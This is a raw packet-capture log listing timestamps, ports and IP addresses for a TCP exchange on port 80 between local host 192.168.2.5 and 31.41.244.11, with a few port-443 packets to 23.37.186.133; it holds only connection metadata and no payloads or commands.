Dec 16, 2024 11:03:20.357064962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.357091904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.357108116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.358283043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.358299971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.358329058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.358350039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.359364986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.359381914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.359441996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.360434055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.360486984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.360527039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.360585928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.361593008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.361685991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.361753941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.362797022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.362814903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.362848043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.362875938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.363902092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.364109993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.364161015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.365102053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.365118980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.365169048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.366225958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.366277933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.366493940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.366542101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.367388964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.367446899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.367563963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.367608070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.368614912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.368632078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.368660927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.368678093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.369812012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.369828939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.369879007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.370898962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.370915890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.370950937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.370965958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.372013092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.372072935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.372127056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.373127937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.373203039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.373311043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.373374939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.374250889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.374300003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.374455929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.374510050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.378781080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.378808022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.378825903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.378871918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.378905058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.416913986 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:20.417104006 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:20.419586897 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:20.419645071 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:20.420186996 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:20.467716932 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:20.469568968 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:20.509355068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.509422064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.509497881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.509545088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.509835005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.509855032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.509885073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.509907961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.511028051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.511044979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.511079073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.511095047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.511425972 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:20.512211084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.512263060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.512273073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.512329102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.513310909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.513329029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.513359070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.513372898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.514517069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.514533043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.514585972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.515665054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.515713930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.515717983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.515763998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.516921043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.516937017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.516973019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.516989946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.517981052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.518033981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.518105984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.518151999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.519138098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.519155025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.519187927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.519202948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.520154953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.520204067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.520339966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.520382881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.521518946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.521590948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.521627903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.521678925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.522686005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.522706985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.522732973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.522753954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.523031950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.523049116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.523077011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.523098946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.525223017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.525243044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.525279045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.525293112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.526362896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.526412964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.526519060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.526562929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.527230024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.527295113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.527339935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.527384996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.528356075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.528373957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.528408051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.529540062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.529556036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.529602051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.530900002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.530915022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.530952930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.531793118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.531807899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.531838894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.531861067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.533015966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.533032894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.533067942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.533092022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.534025908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.534075975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.534190893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.534235954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.535278082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.535336971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.535492897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.535550117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.536468029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.536484957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.536516905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.536534071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.537502050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.537555933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.537691116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.537736893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.538736105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.538753033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.538794994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.538839102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.539861917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.539879084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.539916039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.539932013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.541093111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.541110992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.541141987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.541161060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.542248011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.542264938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.542301893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.543200016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.543251991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.543559074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.543608904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.543646097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.543663025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.543693066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.543720961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.544435024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.544481993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.544524908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.544569969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.545562029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.545614004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.545645952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.545742035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.546711922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.546771049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.546807051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.546866894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.547866106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.547923088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.547960043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.548007011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.549004078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.549056053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.549165964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.549215078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.550178051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.550234079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.550266027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.550319910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.551300049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.551357031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.551425934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.551476002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.552470922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.552520037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.552556038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.552628040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.553637981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.553690910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.553766012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.553813934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.554837942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.554871082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.554891109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.554914951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.555969000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.556019068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.556176901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.556231976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.557100058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.557149887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.557223082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.557267904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.558301926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.558348894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.558434963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.558484077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.559459925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.559505939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.559551954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.559597969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.560590029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.560638905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.560681105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.560726881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.561759949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.561809063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.561870098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.561968088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.562927961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.562977076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.563010931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.563062906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.564045906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.564094067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.564148903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.564193964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.565174103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.565229893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.565268993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.565318108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.566329956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.566378117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.566385984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.566437006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.567567110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.567615986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.567678928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.567724943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.568614960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.568667889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.700239897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.700279951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.700336933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.700683117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.700728893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.700757027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.700798988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.701847076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.701982021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.702032089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.703111887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.703164101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.703166008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.703233004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.704186916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.704237938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.704289913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.704339981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.705336094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.705389023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.705430031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.705565929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.706522942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.706640005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.706685066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.707896948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.707945108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.707964897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.708003998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.708781004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.708822966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.708909035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.708951950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.709989071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.710046053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.710083961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.710129976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.711137056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.711249113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.711271048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.711438894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.712290049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.712404013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.712449074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.713742018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.713920116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.713967085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.715039968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.715086937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.715195894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.715279102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.716233969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.716283083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.716310024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.716355085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.716931105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.716973066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.716995955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.717010975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.718111992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.718203068 CET	49800	80	192.168.2.5	31.41.244.11
